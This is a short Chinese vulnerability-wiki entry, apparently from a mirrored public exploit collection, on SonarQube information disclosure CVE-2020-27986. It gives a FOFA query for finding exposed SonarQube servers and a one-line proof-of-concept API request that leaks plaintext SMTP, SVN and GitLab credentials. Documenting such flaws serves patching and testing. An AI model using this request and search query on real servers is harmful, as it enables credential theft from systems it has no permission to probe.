menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right SonarQube chevron_right SonarQube api 信息泄露漏洞 CVE-2020-27986.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    SonarQube api 信息泄露漏洞 CVE-2020-27986.md
    754 B / 2021-04-21 09:23:46
        # SonarQube api 信息泄露漏洞 CVE-2020-27986

## 漏洞描述

SonarQube 某接口存在信息泄露漏洞,可以获取部分敏感信息

## 漏洞影响

> [!NOTE]
>
> SonarQube

## FOFA

> [!NOTE]
>
> app="sonarQube-代码管理"

## 漏洞复现

主页如下

![](resource/SonarQube-api-信息泄露漏洞CVE-2020-27986/media/1.png)

漏洞POC

```
http://xxx.xxx.xxx.xxx/api/settings/values
```

![](resource/SonarQube-api-信息泄露漏洞CVE-2020-27986/media/2.png)

可泄露的为:明文SMTP、SVN和Gitlab等敏感信息

![](resource/SonarQube-api-信息泄露漏洞CVE-2020-27986/media/3.png)

## Goby & POC

> [!NOTE]
>
> SonarQube api Information leakage

![](resource/SonarQube-api-信息泄露漏洞CVE-2020-27986/media/4.png)
    links
    file_download